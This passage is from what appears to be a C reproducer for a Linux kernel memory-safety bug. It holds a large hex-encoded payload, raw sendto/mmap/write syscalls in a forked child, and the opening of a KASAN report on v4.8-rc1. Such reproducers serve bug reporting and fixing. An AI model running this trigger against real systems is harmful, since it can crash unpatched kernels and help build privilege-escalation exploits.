b\\xbb\\xc9\\x6c\\xa8\\xf8\\xe9\\x37\\x86\\x61\\x37\\x9f\\xba\\xb3\\x9e\\x54\\x07\\xe6\\xff\\x6f\\x54\\x8c\\xcf\\x7e\\x3d\\x14\\xfd\\x94\\xbb\\xdc\\x59\\x5d\\x22\\x86\\xb5\\x3b\\x18\\x0d\\x08\\xad\\x15\\x67\\x6b\\xf1\\xc8\\xd8\\x81\\xac\\x14\\x63\\xcf\\x1e\\xf9\\x48\\xba\\xe0\\x33\\x4c\\x1e\\x72\\xe9\\x00\\x1a\\x48\\xc5\\xb4\\x2c\\x71\\xd6\\x7a\\x0b\\x8f\\x6c\\x02\\x9a\\x02\\xa9\\x20\\xbd\\x8a\\x56\\xe1\\x59\\x92\\x1f\\x5f\\xea\\x61\\x1b\\xe3\\x2f\\xc0\\x15\\x9c\\x3e\\xcf\\xe7\\x05\\xbc\\x7e\\xe8\\x88\\x58\\x63\\x29\\xc5\\x10\\x26\\xf0\\xbc\\xf5\\xcd\\x3d\\x33\\xfa\\x87\\x45\\x25\\x1d\\x86\\xc0\\xd8\\x72\\xdc\\x1b\\xaf\\xa1\\xf3\\x1e\\x81\\xb4\\x7b\\x4d\\xb5\\x79\\x72\\x87\\x92\\x1f\\x9d\\xa1\\x8e\\x1a\\x24\\x7f\\x49\\x11\\xc4\\x59\\xa5\\x8e\\x6c\\x7a\\xdd\\x17\\x52\\x47\\x3b\\x09\\x28\\xe4\\x3b\\xef\\xb0\\xf3\\x68\\x9c\\xd3\\x6e\\xe9\\x89\\x38\\xdb\\xeb\\x01\\x4f\\x39\\x9b\\x5b\\x0c\\x8d\\x92\\xcd\\x5c\\x15\\x47\\x15\\xa9\\x98\\x70\\x75\\xe2\\xf0\\x5b\\xfe\\xaa\\xa9\\xb3\\xba\\xc9\\x8e\\x5c\\x6d\\xfb\\x53\\xb9\\x8b\\x4f\\x7e\\x31\\xbe\\x69\\x7e\\x6d\\x80\\x6f\\x3e\\xd8\\x59\\x1c\\x13\\x5a\\x3b\\x2b\\x0e\\xc6\\xd1\\xf9\\xaa\\xf1\\x30\\x16\\xf1\\x7b\\x2f\\x6b\\x5f\
\xa9\\xde\\xfa\\xfd\\x59\\xaa\\xdd\\x32\\xf7\\xbb\\x94\\x28\\x93\\x16\\xb3\\x60\\xd5\\x6c\\x62\\x93\\xba\\xa9\\xaa\\x38\\x52\\xdc\\x2f\\x37\\x75\\x1d\\x56\\xa9\\x3c\\x7c\\x8b\\x0d\\x56\\x9e\\x05\\xf7\\xa1\\xa6\\xef\\x3c\\x76\\x6e\\x06\\x06\\xde\\x07\\x84\\xa0\\xeb\\xeb\\x8e\\x46\\x2f\\xd9\\xc2\\x56\\xc6\\x89\\x85\\x8c\\x39\\xad\\xa2\\x77\\x24\\xe5\\xb5\\x00\\x04\\x4c\\xf5\\x1e\\x4a\\x03\\x06\\xbb\\xa1\\x1f\\xe7\\xf8\\xb7\\x3e\\xdd\\xfc\\x18\\xbf\\x13\\x07\\x14\\xdd\\x8a\\x6b\\x0f\\x44\\xc0\\xeb\\x4a\\x43\\x7d\\x42\\xe9\\x02\\x63\\xb5\\xc2\\x7a\\x87\\xce\\x14\\x0c\\xaf\\xd9\\x2b\\xaf\\x4b\\x22\\xec\\xa9\\x3b\\x16\\xeb\\xb7\\xc5\\x0d\\x51\\x91\\x93\\x5d\\x90\\xe1\\x8f\\x34\\x86\\x71\\xe0\\x7c\\xb5\\x1e\\xe7\\x19\\xc0\\xd6\\xc9\\x3e\\x08\\x75\\xc0\\x1f\\xab\\x5e\\x41\\xbf\\x0e\\x1a\\x14\\xcc\\x40\\xf6\\x85\\x02\\xba\\x3d\\x78\\xce\\xf7\\x6f\\x0e\\xbf\\x51\\xda\\xc6\\xa1\\x59\\xbd\\x69\\x1a\\x05\\x7b\\x34\\xbd\\xa7\\x28\\x39\\xa1\\xa2\\x18\\xa7\\x76\\x8f\\x51\\xa5\\xd2\\xdc\\xf4\\xa7\\x7b\\xc8\\x64\\x0e\\xc0\\xe8\\xac\\xc3\\xd4\\xb9\\x11\\x78\\x58\\x79\\xe4\\x91\\xc9\\xcf\\xe2\\x0c\\xbb\\x11\\xb3\\x80\\x48\\xd7\\xa5\\xbd\\x45\\xdd\\xb6\\xad\\x87\\x79\\x01\\xa0\\xe1\\x89\\xdb\\x54\\x42\\x1c\\x78\\x47\\x91\\x07\\xe8\\xbc\\x26\\x15\\xf2\\xdb\\xba\\x5b\\xaa\\x5a\\x05\\x84\\xa2\\x83\\x7d\\xe5\\xbb\\x5a\\x77\\x3f\\x0a\\x27\\x06\\x4e\\x86\\x69\\x95\\x27\\x22\\x7e\\xa2\\x42\\x4d\\x61\\xa7\\xab\\x6d\\x05\\x8b\\x7b\\x6b\\x94\\xd6\\x10\\x40\\x66\\x30\\x0b\\x6c\\x79\\xe1\\x62\\xee\\x33\\xed\\xd6\\xd4\\x9a\\x3a\\xea\\x95\\x5b\\x60\\x70\\x58\\xc9\\xc6\\x6c\\x47\\xa7\\xd1\\xcc\\xfa\\x9f\\xc7\\x66\\xac\\xbb\\x4f\\xe4\\x09\\x74\\xe3\\xd1\\xeb\\x82\\x3b\\xce\\x4c\\x2b\\xcf\\x08\\xcd\\xf6\\x96\\x2b\\x65\\x2a\\x2c\\x33\\xf5\\x7b\\x66\\xdb\\xec\\x3d\\xbf\\x24\\xf7\\xf9\\x87\\x99\\x26\\x1b\\x5a\\xa0\\xd0\\x0e\\x2f\\xc0\\x2e\\x03\\xcd\\xf4\\x1e\\x10\\x7c\\xb5\\xb7\\xec\\x75\\x2c\\x20\\x89\\xc4\\xec\\x61\\x34\\x3b\\x6c\\x68\\x14\\x95\\xd9\\x9a\\x03\\xd7\\xf2\\x6b\\xe6\\x50\\x14\\x80\\x72\\xa2\
\x67\\xaf\\xb3\\x19\\x12\\xcc\\xf9\\x9d\\x3d\\x34\\x86\\x48\\xe7\\xa6\\xe7\\xc0\\x9b\\x6c\\xeb\\x2c\\x0d\\x26\\x6f\\x09\\xd9\\x8c\\x92\\x8e\\xde\\x80\\x04\\x14\\xe6\\x88\\xbb\\x39\\x2f\\x2c\\x14\\xf2\\xda\\x86\\xdb\\x10\\x59\\x54\\x83\\xe6\\x5e\\xe3\\x14\\x4b\\x73\\x97\\x9a\\x94\\xa8\\x09\\x44\\x1d\\xd0\\x62\\x2d\\x43\\xb4\\x5e\\x38\\xaa\\x8e\\x5b\\xdd\\x2f\\xd3\\x2c\\x8e\\xd3\\xd0\\x0f\\x9d\\x80\\xca\\x87\\x4e\\xab\\x52\\x01\\x29\\xb7\\xe7\\x55\\xa2\\xe4\\x2d\\xee\\xce\\x30\\xe9\\xcb\\xc4\\x3e\\xf9\\x58\\x04\\x63\\x01\\xec\\x89\\x33\\x01\\x26\\x7d\\xe2\\x5d\\x41\\xf7\\x91\\xa3\\xcb\\x41\\x62\\xb4\\x82\\x6d\\xb9\\xd1\\xad\\xf2\\x96\\x0f\\xad\\x87\\xbe\\x6d\\x95\\xaf\\xc2\\x14\\x12\\x78\\x10\\x90\\x86\\x61\\x55\\x97\\x77\\x5c\\x19\\xfe\\x4e\\xda\\xf3\\x74\\x08\\x83\\x4d\\xa0\\x25\\x04\\x05\\x4b\\xf3\\x30\\xc1\\x2f\\xb6\\x16\\x2d\\x9b\\x2c\\x7d\\x90\\x5a\\xd2\\x28\\x53\\xc5\\x3a\\x14\\x8c\\x1f\\xda\\xd7\\x36\\x47\\xdc\\x85\\x7f\\x2b\\xe8\\x0d\\xf9\\x03\\x92\\xba\\x82\\x20\\xde\\xb3\\x65\\x14\\xe8\\xdd\\xfe\\x6b\\x3a\\xab\\xd5\\xad\\x03\\xcb\\x4f\\x41\\x08\\x97\\x22\\xe7\\xc7\\x1d\\x0e\\x7c\\x8e\\x4d\\x12\\x2c\\x86\\x8b\\xb3\\x31\\x43\\x5f\\x6e\\x37\\xcf\\x08\\x83\\x4d\\x16\\xd7\\x3f\\x4a\\x80\\x2b\\x67\\x1a\\xbb\\xaf\\x8d\\x1c\\x1c\\x5d\\x00\\x33\\xf3\\x67\\x13\\x43\\xf1\\x09\\x00\\x81\\x68\\xe1\\x33\\xb1\\xb4\\xc1\\xad\\xd9\\x99\\x0c\\xac\\x4f\\x09\\x26\\xd7\\xff\\xc8\\xcd\\xfd\\xe9\\x32\\x52\\xd1\\x4c\\xee\\x61\\x89\\xe0\\x82\\x64\\xa3\\x6b\\xeb\\x23\\x87\\xc8\\xed\\x94\\xa6\\x6b\\x68\\xec\\x13\\x59\\xa7\\x74\\x06\\x7d\\xac\\x6f\\xfd\\xf5\\x3d\\x3b\\x9d\\x8b\\xe1\\x22\\x98\\xf3\\x0e\\xbd\\x3f\\xfa\\xbe\\xb9\\x86\\x3d\\xe4\\x1f\\x30\\xd4\\x96\\x6f\\x7f\\xd4\\x48\\xbc\\xc9\\x8b\\x1e\\x8f\\x63\\xa1\\xb4\\xa9\\x43\\xf2\\xb8\\x28\\x5e\\x57\\x93\\xc5\\x56\\x21\\x12\\x20\\xd5\\x16\\x29\\x14\\xb0\\xff\\x42\\xba\\x0e\\x26\\x6e\\xcd\\x7e\\x7c\\x72\\x27\\xfb\\xd2\\x0f\\xac\\xdb\\x0d\\xc8\\xc8\\xd6\\xa0\\xc7\\x5b\\xfd\\x0c\\xd7\\x89\\xe8\\x8b\\xee\\x24\\x0f\\xd1\\x78\\x23\\x82\
\xe7\\xb5\\x7f\\x63\\xb3\\x14\\x10\\x78\\x26\\x23\\xd3\\x60\\xbd\\x53\\x5a\\x1b\\x67\\x0f\\xcf\\xd5\\xfe\\x90\\x18\\xa9\\xd6\\x80\\xc3\\x94\\x00\\x21\\x6d\\xdb\\xab\\x09\\x38\\x0d\\x77\\xdc\\x3e\\x90\\x2f\\x3c\\x0e\\x06\\x6b\\xaf\\x14\\x45\\xcc\\x0d\\xcb\\x1b\\x74\\xdc\\x01\\xec\\x29\\x23\\x96\\xe0\\x2a\\x86\\xee\\x92\\x9c\\x86\\x10\\x9f\\x3d\\x7a\\x56\\xf3\\x6f\\x3b\\xef\\x2b\\x84\\xd5\\xcf\\xd3\\xf7\\x2b\\xa6\\x0d\\x9c\\xa2\\xb0\\x42\\x8f\\xed\\x53\\x99\\x7a\\x11\\x64\\x5e\\x53\\x92\\xb7\\x97\\x20\\xaa\\x25\\xc2\\x5d\\x6b\\xbd\\xde\\x58\\xe7\\x51\\xc2\\xd5\\xa5\\xe0\\x9b\\xbf\\xe4\\x81\\x1c\\xd5\\xc4\\xee\\x29\\xfa\\xd2\\xbb\\xce\\xbf\\xfe\\x40\\xee\\x09\\xf5\\x4b\\xb2\\x1e\\x33\\xef\\x8f\\xf9\\x05\\x68\\x15\\x7a\\x45\\xa0\\x52\\x3c\\x29\\xf4\\x01\\xf2\\x64\\x98\\x2d\\xbd\\x89\\xae\\x86\\x80\\xd9\\x0a\\xfe\\xca\\x86\\x46\\xc3\\x58\\xd6\\x1d\\x54\\xd4\\x6f\\x36\\xe0\\x32\\x6a\\x23\\x29\\xbd\\x69\\x22\\x9b\\x1e\\x7f\\x01\\x28\\xff\\xc0\\x1c\\x8f\\x01\\x08\\xa4\\x96\\xda\\xfe\\x96\\xab\\xf2\\x23\\x34\\x34\\xb0\\x46\\x38\\xd6\\x2f\\x87\\x62\\xcf\\x96\\x85\\xbb\\xcc\\x98\\x27\\xfc\\x91\\xea\\xd9\\x78\\xc4\\xcb\\x42\\xc0\\xd3\\x7d\\x90\\x1c\\xfa\\x62\\xa8\\xb7\\xf3\\x31\\x04\\x56\\xa1\\x97\\xe1\\xa8\\xfc\\xab\\x90\\x64\\x01\\x81\\xae\\x20\\x05\\x2f\\x91\\xaf\\x27\\xb9\\xb5\\x12\\xce\\x94\\xa6\\x6b\\x32\\xf2\\xd0\\x0b\\xf5\\x71\\xff\\xbb\\xd8\\xe1\\x20\\x5f\\x0d\\xbe\\x90\\x44\\xe4\\xa5\\xb5\\xf6\\xa3\\x70\\x5b\\xd3\\x24\\xa2\\xb6\\xba\\x22\\xd7\\x27\\x47\\xff\\xff\\x79\\x65\\xf1\\x82\\xcf\\x51\\x56\\xa6\\x6f\\x48\\x32\\x66\\x7b\\x3f\\x3f\\x7c\\xb8\\x6f\\x0f\\x2d\\xe8\\x92\\x72\\x86\\xc4\\x9e\\x6f\\xe7\\xb6\\x3f\\xb6\\x6f\\x96\\xdc\\x68\\x8d\\x1d\\x1c\\xfe\\x3f\\x23\\x45\\x7d\\x35\\xed\\x3d\\x6a\\x06\\xe8\\x4b\\x7f\\xb1\\xe6\\x2b\\x66\\x4a\\x53\\x45\\xa4\\x5c\\x77\\x96\\x25\\x4a\\x13\\x3a\\xf3\\xbe\\x7e\\x16\\xb0\\x51\\x84\\x53\\xe6\\x4e\\x37\\xd7\\xc1\\xee\\xda\\xfb\\x18\\xb0\\x81\\x3b\\x16\\xfc\\xea\\x32\\x00\\x75\\x97\\x1a\\xc9\\xf9\\x5a\\x44\\x1a\\x12\\x08\\xcb\\xbe\
\x60\\x79\\x80\\x60\\xcd\\xbd\\x5b\\x60\\x9b\\xfc\\x31\\x5b\\xca\\xa5\\xda\\x16\\x18\\x45\\x95\\xe1\\x5b\\xd4\\x4c\\xdc\\xc9\\x10\\x73\\x14\\xbb\\x0b\\x9c\\xdb\\x0c\\x0c\\x8c\\x3b\\x42\\x29\\xf4\\x7d\\x93\\x61\\x5a\\x6a\\x6b\\xac\\xae\\x80\\x60\\x5d\\xd1\\x3e\\xe4\\x6d\\xf7\\x3f\\xb8\\x7b\\x7f\\x35\\x1b\\x67\\xd3\\x60\\x80\\x0a\\x08\\x25\\xff\\xbb\\x31\\x47\\x60\\xb3\\xd1\\x0e\\xce\\xbc\\xf3\\x88\\xe0\\x56\\x5e\\x61\\x97\\x63\\x82\\xa4\\xff\\xea\\xf9\\x48\\x7f\\x4c\\x62\\x58\\x46\\x30\\xe5\\x2c\\xbe\\xa0\\x18\\xe4\\xe8\\xf6\\x4f\\x22\\x5b\\x1d\\x18\\xb0\\x48\\x0c\\xe7\\x25\\xa9\\x1a\\x8e\\x5a\\x3f\\xbd\\x4c\\xab\\xe7\\x52\\x29\\xa2\\x35\\x77\\xf5\\x0c\\x8c\\x4e\\x2d\\xa9\\x16\\x11\\x00\\xdf\\x8b\\xe1\\x7f\\x8f\\x20\\x9d\\xe9\\xea\\x2b\\x4e\\xf4\\xe5\\x98\\x4e\\xf8\\xe9\\x5b\\x98\\xb9\\x2a\\xb8\\x68\\x0d\\xdb\\x35\\xf8\\xfd\\x5d\\x28\\x14\\x2a\\x65\\x33\\x3d\\xde\\x77\\xc5\\x73\\xee\\xc4\\xa4\\x8e\\x76\\x12\\x4f\\x28\\x93\\x7d\\xd8\\xf5\\xbf\\x32\\x39\\xe1\\xc1\\xaa\\x46\\x71\\x9f\\xcb\\xa4\\x93\\xa5\\xae\\xe0\\xb1\\x9f\\x03\\xb3\\xbe\\x86\\xf9\\x92\\x45\\x65\\x64\\x8d\\xd9\\x49\\x09\\xd2\\x0c\\x01\\x92\\x75\\x1a\\x29\\x43\\x34\\x74\\x21\\x6d\\xa6\\x0e\\xa7\\x3b\\x15\\x2c\\x59\\xc2\\xb9\\x8a\\x92\\xcb\\xc3\\x8c\\xc7\\x06\\xfd\\xfc\\xe1\\x67\\xc7\\xc5\\xc6\\x07\\x24\\xc8\\x06\\xa7\\xdc\\x76\\x83\\x43\\xec\\x90\\x3b\\x6f\\xa0\\x00\\x9a\\x68\\x44\\x71\\x19\\xbe\\xdb\\x24\\xb0\\xcb\\x9b\\x8a\\x28\\xb6\\x30\\x99\\x79\\xd2\\x42\\xbe\\x53\\x32\\x84\\x0c\\x17\\xdc\\xc9\\x1c\\xa9\\xed\\x26\\x20\\x69\\xef\\x6d\\xc4\\xa4\\xad\\xe5\\x68\\xec\\x52\\xe8\\x51\\x3f\\xb2\\x52\\xbc\\x6f\\x84\\x26\\x41\\xf9\\x91\\x22\\x66\\x89\\xcc\\x03\\xa6\\xa5\\x7a\\x07\\xd7\\x35\\x92\\x5e\\xc1\\xf9\\x11\\x1b\\x4b\\x6d\\x50\\x7b\\x4f\\x43\\xca\\x13\\x37\\xd2\\x6d\\xce\\x81\\xa8\\x9b\\x8b\\x8c\\x65\\x75\\x08\\x97\\x18\\xb6\\xd2\\x2e\\xd2\\xe3\\x31\\x51\\x2e\\xb0\\xb3\\x04\\x64\\x71\\xba\\x05\\x4b\\x23\\x91\\x92\\xfd\\x4a\\x1b\\x6c\\x35\\xa5\\x8f\\xcb\\xb5\\xac\\xd9\\x40\\xe5\\x4b\\x6b\\x04\\xe2\\x2a\
\xab\\xd9\\x0d\\xcf\\x0b\\x23\\xfa\\x1f\\xcd\\x4a\\x46\\xb0\\x26\\xc4\\xb8\\xae\\x17\\x82\\x6c\\x7f\\x6f\\xe6\\x1a\\x8c\\x0d\\x95\\xdf\\xe2\\xc2\\xd4\\x5c\\x85\\x6d\\x79\\x3b\\x8a\\x6c\\x51\\xf3\\x5f\\x06\\xdf\\x07\\x5b\\x69\\x8a\\xde\\x75\\x59\\x6d\\x70\\x99\\x55\\x09\\x8f\\xf8\\xc0\\x6f\\x2e\\xc3\\x0f\\x87\\x1c\\x79\\xe8\\x4b\\xb0\\x55\\x51\\xb2\\xa3\\x91\\x9b\\xb0\\x89\\x17\\xad\\x9b\\x89\\x81\\x23\\x12\\xcb\\x45\\x8a\\xd7\\x2a\\x0a\\x19\\x84\\x7d\\xb9\\x64\\xa6\\x31\\xa3\\x48\\x30\\x3c\\x01\\x6b\\x7c\\x74\\x20\\xe6\\x0b\\xff\\x2a\\x0a\\x66\\x82\\x00\\x31\\x01\\xbc\\xf8\\x47\\x02\\xcc\\x43\\xbe\\x6d\\x0c\\x0e\\x4f\\x59\\x37\\x4d\\xcb\\xc2\\x37\\xee\\x5e\\x1c\\x2c\\xf3\\xda\\xc8\\xf8\\xc9\\x8c\\xbc\\xff\\xd9\\x8b\\x8a\\xee\\x4e\\xab\\x19\\x8f\\xb6\\xb4\\xe7\\x0a\\xda\\x9c\\x5c\\x00\\xc3\\x26\\x87\\x63\\xb0\\xa9\\x1b\\x31\\x62\\xef\\x04\\x10\\x68\\x6c\\x3c\\xd1\\xba\\x73\\xc1\\xaa\\xf2\\xe4\\xbd\\x29\\xdb\\x2c\\xe3\\x69\\xf0\\x34\\x8d\\xd3\\x6b\\x6e\\x59\\x42\\x6f\\x28\\x3d\\x2f\\x83\\x27\\x48\\xc0\\xb7\\x82\\xd3\\x95\\x96\\x0c\\xdf\\x22\\xc7\\xce\\x77\\xab\\x09\\x4c\\xad\\xab\\x0d\\x70\\xee\\x4d\\xea\\xb3\\x63\\x62\\x04\\x6f\\xd7\\x68\\x2e\\x86\\x7c\\xac\\xd4\\xc2\\x6e\\x09\\xdf\\xf0\\xbe\\x8c\\x71\\xd9\\xa8\\x82\\xf8\\xd2\\x14\\x70\\xb7\\xd0\\x40\\x12\\x5e\\xa7\\xec\\xab\\x1a\\x13\\x87\\x0b\\x6e\\x28\\x59\\x76\\x01\\xb2\\x3f\\x64\\x62\\x35\\xb3\\xff\\x0d\\x8a\\x3d\\x6b\\x5a\\xd3\\x9e\\x59\\x14\\x6d\\x19\\x4c\\x99\\x04\\x75\\xe4\\x04\\xe3\\xf2\\x8a\\x19\\x77\\x06\\xdd\\x5f\\x2e\\x25\\x2c\\xa3\\xb5\\x52\\xa6\\xfa\\x2b\\x84\\x35\\xdc\\x56\\x55\\x02\\x63\\x79\\x81\\x3b\\x27\\x82\\x41\\x92\\x19\\xb3\\xe3\\x63\\xce\\xb5\\x0c\\x1a\\x15\\x15\\x38\\x2a\\x52\\xf0\\xdd\\x58\\x3d\\xa4\\x7f\\x5b\\xb9\\xa3\\x9c\\x90\\x14\\xf9\\x2c\\x2b\\xaa\\x1e\\x0d\\xfd\\xf6\\x93\\x7e\\xbc\\xc3\\x59\\x11\\x6e\\xd9\\x52\\x1e\\xd0\\xea\\x0b\\x55\\x0b\\x71\\xfa\\x69\\xda\\x9d\\x35\\x10\\x70\\x32\\x68\\xe8\\xde\\x47\\x74\\x1f\\xc6\\x60\\x86\\xbd\\x15\\x1c\\x6b\\x52\\xeb\\xe4\\x04\\x0f\\x8c\\x70\
\x2f\\x8d\\x6d\\x7e\\x5f\\xfd\\xe7\\xd1\\x87\\x80\\x76\\xd8\\x7a\\x2c\\xbf\\xb2\\x98\\x12\\x83\\x81\\x94\\x11\\x7d\\x1c\\x90\\xfd\\xf0\\xdc\\xe6\\x9d\\xee\\x76\\xde\\x50\\xcb\\x97\\x25\\xca\\x88\\xd8\\x70\\x97\\x40\\x25\\x94\\xc5\\xfe\\x8b\\x44\\x05\\x8d\\x6e\\x7f\\xab\\xc3\\x27\\xd8\\x0e\\x4a\\x30\\xb5\\xfb\\x95\\xf8\\x34\\x75\\x01\\x1f\\xe6\\xac\\x81\\x1b\\x13\\x63\\xb7\\x60\\xb8\\x1c\\x3b\\xda\\x07\\x26\\x9e\\xfd\\xeb\\x7f\\x43\\x46\\x93\\x75\\x63\\xdc\\xa7\\xe9\\xc1\\x8f\\xa9\\x06\\x96\\xe7\\x10\\x87\\xb4\\x32\\x4a\\x30\\x69\\xd2\\xf4\\x2b\\x5d\\x76\\xa3\\x94\\x6b\\x72\\xd9\\xc6\\xfa\\x6a\\x49\\x12\\xc7\\xc2\\x74\\x3f\\xc4\\x39\\x9f\\xa0\\x7e\\xcd\\x81\\x9c\\x54\\x0f\\x14\\xce\\xd3\\x7e\\xd8\\xe8\\xd2\\xc2\\x24\\x2e\\xc5\\x1b\\x58\\xf8\\x8e\\xe6\\xaa\\x16\\x69\\x6c\\x4b\\x40\\x86\\x1a\\x1a\\xad\\x11\\x6f\\x90\\x48\\x68\\x93\\xb1\\x8f\\xbd\\xaf\\x8d\\x00\\x09\\x5e\\xf4\\xe3\\x03\\x59\\xff\\x8f\\xf5\\xf0\\xe2\\xa1\\x79\\x93\\xf5\\x76\\xcb\\x56\\x93\\xb8\\xe6\\x22\\xe5\\x69\\x90\\x3d\\x0f\\x9b\\x57\\x86\\x19\\xf7\\x63\\xd5\\x2c\\xfe\\xad\\x63\\x60\\x9e\\x9e\\x29\\x04\\xe9\\x4d\\xb6\\xd9\\xb1\\xdb\\x42\\x2d\\x8b\\x8d\\x6d\\xdd\\xae\\x0b\\xca\\x58\\x38\\xf4\\x30\\xad\\xae\\xa3\\x3d\\x64\\x47\\xe0\\x77\\xc3\\xed\\xc8\\xe0\\x7d\\x3c\\x6c\\xda\\xbd\\x47\\x5e\\x37\\xb4\\xe4\\xb8\\x1c\\x69\\x16\\xb6\\xd5\\x8b\\x9a\\x15\\xfa\\x6b\\x21\\x88\\x74\\xbb\\xdf\\xe3\\xbe\\x31\\x02\\x8e\\x82\\x81\\x10\\x98\\x24\\x74\\x04\\xad\\xe3\\xc5\\x63\\x57\\x0d\\x58\\xbe\\x1c\\x97\\xa1\\x0d\\xb6\\x55\\x83\\x18\\x41\\x37\\xa7\\x1b\\x51\\x37\\x13\\x99\\xeb\\x6f\\xe3\\x70\\xc2\\x4a\\x8c\\x17\\xc6\\x30\\x8d\\x01\\xfe\\xd4\\x71\\x4c\\xee\\x82\\x94\\xe4\\x1d\\x9a\\x8a\\xed\\x48\\x61\\xba\\x6c\\x63\\x5f\\x3b\\x13\\x9f\\x5b\\xe4\\x0b\\x2c\\x44\\x1c\\xb7\\xf6\\xc7\\x64\\xf6\\x74\\x4a\\x16\\x7a\\x35\\xf7\\x2e\\x9d\\x4f\\x00\\x38\\xa7\\xad\\xe7\\x17\\x0c\\xb7\\x3f\\x02\\x41\\xe9\\xa3\\x37\\x5b\\x98\\xd5\\x0f\\xc6\\xe6\\xd1\\x38\\x4e\\x87\\x4f\\x2f\\x02\\xa1\\x27\\x4d\\xb2\\x03\\xfc\\x50\\x48\\xaa\\x33\
\x92\\xe1\\x10\\xa6\\x0b\\xb0\\x20\\x7c\\x57\\xd4\\x85\\x55\\x51\\x6e\\x7e\\xdf\\xa2\\x46\\xf5\\x94\\x93\\x03\\x02\\xdb\\x94\\x55\\x23\\xd9\\x5b\\x99\\x2b\\x3a\\x7e\\x7d\\xb1\\x80\\x47\\xf9\\x77\\xee\\x0f\\x5e\\x63\\x7f\\x1e\\x96\\xdf\\xf9\\x1c\\x81\\x55\\xdd\\x02\\x81\\x87\\xc8\\x04\\x52\\x59\\x49\\xd4\\x08\\xd5\\x73\\x43\\x3f\\xd2\\xf9\\xa9\\xf0\\xd7\\xb9\\x97\\x86\\x9c\\x0a\\xc6\\x7d\\x5a\\x98\\x88\\x2b\\x0b\\x38\\xa1\\xcb\\xf8\\x71\\xc7\\x5d\\xfe\\xba\\xd0\\x26\\x4b\\xdf\\xb8\\x11\\x8f\\x71\\x60\\x68\\xc7\\x82\\xd0\\x36\\x97\\x23\\x56\\xda\\x52\\x58\\x90\\x0a\\x42\\x0b\\xfc\\xf8\\xc9\\x1f\\x36\\x7f\\x9f\\xe5\\x5b\\xf8\\x6e\\xe1\\x78\\x47\\xfe\\x6b\\x00\\xcd\\xe5\\x6b\\xe2\\xa6\\xaf\\x2b\\x33\\x95\\x73\\x79\\x52\\x13\\x1c\\x87\\x3d\\x8d\\xbc\\x32\\x1e\\x11\\x25\\x91\\x51\\xa0\\xaf\\xcc\\xf1\\xc3\\x5a\\xea\\x8b\\x15\\x82\\x76\\xa9\\x0f\\xe7\\x08\\x73\\x53\\x02\\x4c\\x8c\\xb2\\x8d\\x4b\\xa0\\xed\\x37\\x20\\x7f\\x54\\xa2\\x2a\\x33\\x6b\\x5f\\x3a\\x4f\\x54\\x61\\x85\\x91\\x86\\x68\\x5a\\xd4\\x80\\xc9\\x21\\xa9\\x16\\x5d\\x77\\xee\\x28\\xeb\\xc2\\x5c\\x22\\xe4\\x27\\xdb\\x5b\\xe4\\xa7\\x70\\xdc\\x6a\\x8e\\xd9\\xe7\\x77\\x09\\x5b\\x94\\x97\\xc6\\xf4\\x1f\\x7a\\x35\\x9e\\x26\\x1e\\x8b\\x37\\xe3\\xa4\\xdc\\x0a\\x8a\\x19\\x59\\x3a\\x77\\x81\\x2d\\x9b\\x0e\\x51\\x2b\\xd7\\xc5\\xbc\\x07\\xfa\\xf3\\x29\\x79\\x35\\x98\\xe3\\xb8\\xf7\\xe5\\x40\\xdf\\xa8\\x93\\x00\\xf6\\x53\\x8c\\xcc\\x33\\xdf\\x0e\\x35\\x3e\\x72\\x8d\\x48\\x85\\x05\\x40\\x43\\xe1\\x13\\xd6\\x4a\\x95\\x50\\xf8\\x32\\xca\\xc3\\x1c\\x28\\xd4\\x41\\x15\\x64\\xc1\\x08\\xfb\\x2c\\xc2\\x1f\\x79\\x30\\x58\\xaa\\x7c\\x0d\\x83\\x8e\\x87\\xf4\\x2e\\xa3\\xfc\\xeb\\xd0\\xdb\\xcc\\x15\\xcd\\x88\\x99\\x41\\x75\\x13\\xc1\\x0c\\x53\\x96\\xfe\\xff\\xeb\\x87\\x6a\\x04\\x75\\xf2\\x98\\x40\\x7e\\xc7\\x4e\\x47\\x63\\x31\\x2f\\xb2\\xa2\\x88\\x30\\xca\\x49\\xfb\\x57\\x40\\x65\\x8c\\xc9\\x80\\x20\\xb9\\xc9\\xfc\\x79\\x12\\x8d\\xe6\\x24\\x24\\x5f\\x38\\x47\\x3c\\x93\\x64\\x41\\x9a\\xf2\\xe8\\xab\\xc1\\xaf\\x13\\x95\\x5c\\x26\\x4e\\x02\
\x99\\x5f\\x6a\\xe3\\xd4\\x91\\x0a\\xf5\\x06\\x3a\\x2d\\xc9\\x22\\x96\\x6b\\xa0\\x77\\x00\\x77\\x7c\\x26\\xdc\\xb6\\xc1\\x1b\\x6c\\xc8\\xfe\\x43\\x2c\\xe2\\xdc\\x58\\x7e\\x30\\x38\\x98\\x97\\xdf\\xda\\xae\\x9d\\x40\\x94\\xb7\\x16\\x91\\x66\\x94\\x6c\\x2a\\x50\\x39\\x69\\xce\\xb4\\x5c\\xec\\x2e\\x60\\x71\\x92\\xa3\\x14\\x1f\\x08\\x70\\xcb\\x9c\\x47\\x5b\\xf3\\xf4\\xea\\x7a\\x34\\x43\\x32\\x8b\\x19\\x57\\xd2\\xe7\\x1c\\xc5\\xeb\\xa5\\x66\\x37\\x73\\x80\\x59\\xac\\x1e\\xc0\\x2f\\xf1\\x30\\xf4\\xd0\\xc7\\x78\\x2b\\x38\\xd3\\xab\\x74\\xfd\\x4d\\xdf\\x5e\\xc5\\xa7\\x89\\x1b\\xb7\\x76\\xf5\\xf9\\xfd\\xca\\xfc\\xc2\\x0d\", 4096);\r\n r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);\r\n r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n *(uint32_t*)0x20022fdd = (uint32_t)0x28;\r\n *(uint32_t*)0x20022fe1 = (uint32_t)0x400;\r\n *(uint64_t*)0x20022fe5 = (uint64_t)0x0;\r\n *(uint64_t*)0x20022fed = (uint64_t)0x8ab;\r\n *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;\r\n *(uint16_t*)0x20022ffd = (uint16_t)0x5;\r\n r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);\r\n } else if (pid > 0) {\r\n int returnStatus;\r\n waitpid(pid, &returnStatus, 0);\r\n printf(\"collected child\\n\");\r\n } else {\r\n printf(\"fork failed\\n\");\r\n exit(1);\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\n\r\n// KASAN report on v4.8-rc1, equivalent on master\r\n\r\n/*\r\n[ 21.446876] BUG: KASAN: 